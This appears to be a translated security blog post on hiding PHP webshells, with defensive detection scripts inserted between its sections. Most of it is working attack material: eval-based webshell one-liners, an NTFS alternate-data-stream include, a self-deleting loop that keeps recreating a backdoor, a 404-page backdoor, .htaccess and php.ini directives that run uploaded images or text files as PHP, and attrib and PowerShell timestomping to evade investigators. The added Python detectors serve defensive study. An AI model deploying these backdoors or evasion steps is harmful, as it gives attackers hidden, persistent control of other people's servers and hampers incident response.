PHP backdoor hiding techniques
2020-11-06 22:33:00 【Official account Bypass】
If you want your webshell to survive longer, making the webshell itself evade antivirus detection is not enough; there are also some hiding techniques to be aware of, such as hiding the file, modifying its time attributes, and hiding the file contents.
1、 Hiding files
The attrib +s +a +h +r command adds the system, archive, hidden and read-only attributes to the original file or folder.
rem Hide the shell.php file
attrib +s +a +h +r shell.php
2、 Modifying file time attributes
When you try to hide a newly created file among a bunch of existing files, then besides giving it a confusing file name, you also need to change the file's modification date.
# Modify the last-write time
Set-ItemProperty -Path 2.txt LastWriteTime -Value "2020-11-01 12:12:12"
# Modify the last-access time
Set-ItemProperty -Path 2.txt LastAccessTime -Value "2020-11-01 12:12:12"
# Modify the creation time
Set-ItemProperty -Path 2.txt CreationTime -Value "2020-11-01 12:12:12"
Use the following command to view the file's properties:
Get-ItemProperty -Path D:\1.dll | Format-list -Property * -Force
Modify the creation and modification times of all files in a folder:
powershell.exe -command "ls 'upload\*.*' | foreach-object { $_.LastWriteTime = Get-Date ; $_.CreationTime = '2018/01/01 19:00:00' }"
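From the defender's side, times written this way leave two traces: a timestamp set from a string has no sub-second part, and a folder-wide assignment gives many files the same creation time. The following is an added example, not from the original article; the function names, the cluster threshold and the sample values are assumptions, and both checks are heuristics with benign causes (for example, files extracted from archives).

```python
import os
from collections import defaultdict

NS_PER_SEC = 1_000_000_000

def zeroed_subsecond(*stamps_ns):
    """True if every given nanosecond timestamp falls exactly on a second."""
    return all(t % NS_PER_SEC == 0 for t in stamps_ns)

def audit_timestamps(records, cluster_min=3):
    """records: iterable of (path, mtime_ns, atime_ns, birth_ns).
    Returns {path: [reasons]} for files matching either heuristic."""
    findings = defaultdict(list)
    by_birth = defaultdict(list)
    for path, mtime, atime, birth in records:
        by_birth[birth].append(path)
        # Heuristic 1: times set from a string such as "2020-11-01 12:12:12"
        # carry no fractional part, unlike times stamped by normal file I/O.
        if zeroed_subsecond(mtime, atime, birth):
            findings[path].append("zero sub-second precision")
    # Heuristic 2: one fixed creation time assigned to a whole folder.
    for paths in by_birth.values():
        if len(paths) >= cluster_min:
            for p in paths:
                findings[p].append(f"creation time shared by {len(paths)} files")
    return dict(findings)

def stat_records(directory):
    """Yield timestamp records for the regular files directly inside directory."""
    for entry in os.scandir(directory):
        if entry.is_file(follow_symlinks=False):
            st = entry.stat(follow_symlinks=False)
            # st_birthtime_ns exists on Windows (Python 3.12+) and some BSDs;
            # older Windows builds expose creation time as st_ctime_ns.
            birth = getattr(st, "st_birthtime_ns", st.st_ctime_ns)
            yield entry.path, st.st_mtime_ns, st.st_atime_ns, birth

# Constructed sample values (nanoseconds since the epoch), not real evidence.
FIXED = 1514833200 * NS_PER_SEC
SAMPLE = [
    ("upload/a.php", 1604232732 * NS_PER_SEC, 1604232732 * NS_PER_SEC, 1604232732 * NS_PER_SEC),
    ("upload/b.png", 1604300000123456700, 1604300001987654300, FIXED),
    ("upload/c.png", 1604300002222222200, 1604300003333333300, FIXED),
    ("upload/d.png", 1604300004444444400, 1604300005555555500, FIXED),
    ("upload/e.txt", 1604100000765432100, 1604100009123456700, 1604000000135791100),
]

if __name__ == "__main__":
    for path, reasons in audit_timestamps(SAMPLE).items():
        print(path, reasons)
```

To audit a real directory, pass `stat_records(path)` to `audit_timestamps` instead of the sample list.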
3、 Using ADS to hide file contents
Echo a data stream into a file on the server. For example, if index.php is a normal web page file, we can do this:
echo ^<?php @eval($_POST['chopper']);?^> > index.php:hidden.jpg
This creates an invisible shell, hidden.jpg, which ordinary file managers and the type, dir and del commands cannot find.
Using the include function: hex-encode index.php:hidden.jpg and include this ADS file, so that our one-liner is parsed normally.
<?php @include(PACK('H*','696E6465782E7068703A68696464656E2E6A7067'));?>
4、 The undying webshell
The undying webshell deletes its own file and keeps running as a process, recreating the hidden backdoor in a loop.
<?php
set_time_limit(0);
ignore_user_abort(1);
unlink(__FILE__); // Delete itself
while(1){
    file_put_contents('shell.php','<?php @eval($_GET[cmd]);?>'); // Create shell.php; it is better to use an antivirus-evading one-liner here
    sleep(10); // Interval between writes
}
?>
The simplest and most effective way to deal with it is to restart the service and delete the webshell file.
5、 Middleware backdoor
Copy the compiled .so file to the modules folder, enable the backdoor module, and restart Apache. Sending a string in a specific parameter then triggers the backdoor.
GitHub project address:
https://github.com/VladRico/apache2_BackdoorMod
6、 Using a 404 page to hide a backdoor
A 404 page mainly exists to improve the user experience, but it can also be used to hide a backdoor file.
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
</body></html>
<?php
@preg_replace("/[pageerror]/e",$_POST['error'],"saft");
header('HTTP/1.1 404 Not Found');
?>
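The PHP snippets in sections 3, 4 and 6 each leave a static indicator that a source review can match on. The following is an added example, not from the original article: a small scanner whose rule names and regular expressions are assumptions, run over the page's own snippets plus one constructed benign line.

```python
import re

PACK_HEX = re.compile(
    r"pack\s*\(\s*['\"]H\*['\"]\s*,\s*['\"]([0-9a-f]+)['\"]\s*\)", re.I)
RULES = [
    ("eval of request data",
     re.compile(r"\beval\s*\(\s*\$_(?:GET|POST|REQUEST|COOKIE)\b", re.I)),
    # The /e modifier (removed in PHP 7.0) evaluates the replacement as code.
    ("preg_replace with /e modifier",
     re.compile(r"preg_replace\s*\(\s*(['\"])(.)(?:(?!\1).)*\2[a-z]*e[a-z]*\1",
                re.I | re.S)),
    ("script deletes itself", re.compile(r"unlink\s*\(\s*__FILE__\s*\)", re.I)),
    ("keeps running after client disconnect",
     re.compile(r"ignore_user_abort\s*\(\s*(?:1|true)\s*\)", re.I)),
]

def decode_packed_paths(src):
    """Decode every pack('H*', '<hex>') literal into the string it builds."""
    return [bytes.fromhex(m.group(1)).decode("latin-1")
            for m in PACK_HEX.finditer(src) if len(m.group(1)) % 2 == 0]

def scan_php(src):
    """Return a list of indicator descriptions found in PHP source text."""
    findings = [name for name, rx in RULES if rx.search(src)]
    for path in decode_packed_paths(src):
        # A colon past the drive-letter position marks file:stream (NTFS ADS).
        kind = "alternate data stream" if ":" in path[2:] else "file"
        findings.append(f"hex-encoded path to {kind}: {path}")
    return findings

# The first three samples are the page's own snippets; "benign" is constructed.
SAMPLES = {
    "ads_include": "<?php @include(PACK('H*',"
                   "'696E6465782E7068703A68696464656E2E6A7067'));?>",
    "undying": "<?php set_time_limit(0); ignore_user_abort(1); unlink(__FILE__);"
               " while(1){ file_put_contents('shell.php',"
               "'<?php @eval($_GET[cmd]);?>'); sleep(10); }?>",
    "page404": """<?php @preg_replace("/[pageerror]/e",$_POST['error'],"saft");
header('HTTP/1.1 404 Not Found');?>""",
    "benign": "<?php echo preg_replace('/e+/', 'e', $title); ?>",
}

if __name__ == "__main__":
    for name, src in SAMPLES.items():
        print(name, scan_php(src))
```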
7、 Using a .htaccess file to build a PHP backdoor
In general, .htaccess can be used to leave a backdoor and to bypass blacklists. Create a .htaccess file in the upload directory with the following content; it takes effect without a restart, and uploaded png files are then parsed as PHP.
AddType application/x-httpd-php .png
Alternatively, add a PHP parsing rule to .htaccess so that any file whose name contains 1 is parsed as PHP; an uploaded 1.txt will then be parsed.
<FilesMatch "1">
SetHandler application/x-httpd-php
</FilesMatch>
8、 Using php.ini to hide a backdoor file
php.ini can specify files that are automatically parsed before and after the main file executes. This is commonly used for a shared page header and footer, and it can also be used to hide a PHP backdoor.
; Automatically add a file before PHP documents.
auto_prepend_file = "c:\tmp.txt"
; Automatically add a file after PHP documents.
auto_append_file = "c:\tmp.txt"
The service must be restarted for this to take effect; after that, requesting any PHP file reaches the webshell.
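Both configuration tricks in sections 7 and 8 can be found by auditing the files themselves. The following is an added example, not from the original article: it flags .htaccess directives that hand non-.php files to the PHP handler and php.ini settings that load an extra file on every request. The function names and the sample texts are assumptions.

```python
import re

PHP_EXT = re.compile(r"\.?(php\d?|phtml|phar)$", re.I)
SCOPE_OPEN = re.compile(r'<Files(?:Match)?\s+"?([^">]+)"?\s*>', re.I)

def audit_htaccess(text):
    """Return (line_no, reason) for directives that run non-.php files as PHP."""
    findings, scope = [], None
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        opened = SCOPE_OPEN.match(line)
        if opened:
            scope = opened.group(1)          # pattern of the enclosing block
        elif line.lower().startswith("</files"):
            scope = None
        else:
            parts = line.split()
            name, args = parts[0].lower(), parts[1:]
            if not args or "php" not in args[0].lower():
                continue
            if name in ("addtype", "addhandler"):
                odd = [e for e in args[1:] if not PHP_EXT.match(e)]
                if odd:
                    findings.append((n, "PHP handler mapped to " + " ".join(odd)))
            elif name == "sethandler" and "php" not in (scope or "").lower():
                target = f"files matching {scope}" if scope else "all files"
                findings.append((n, "PHP handler forced for " + target))
    return findings

def audit_php_ini(text):
    """Return (line_no, reason) for auto_prepend_file/auto_append_file settings."""
    findings = []
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.split(";", 1)[0].strip()  # ';' starts a php.ini comment
        m = re.match(r"(auto_(?:prepend|append)_file)\s*=\s*(.*)$", line, re.I)
        if m:
            value = m.group(2).strip().strip("\"'")
            if value and value.lower() != "none":  # empty or 'none' = disabled
                findings.append((n, f"{m.group(1).lower()} loads {value}"))
    return findings

# Constructed samples built from the directives shown in sections 7 and 8.
HTACCESS = r'''AddType application/x-httpd-php .png
<FilesMatch "1">
SetHandler application/x-httpd-php
</FilesMatch>
<FilesMatch "\.php$">
SetHandler application/x-httpd-php
</FilesMatch>'''
PHP_INI = r'''; constructed sample
auto_prepend_file = "c:\tmp.txt"
auto_append_file ='''
```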
This article is from the WeChat official account Bypass (Bypass--).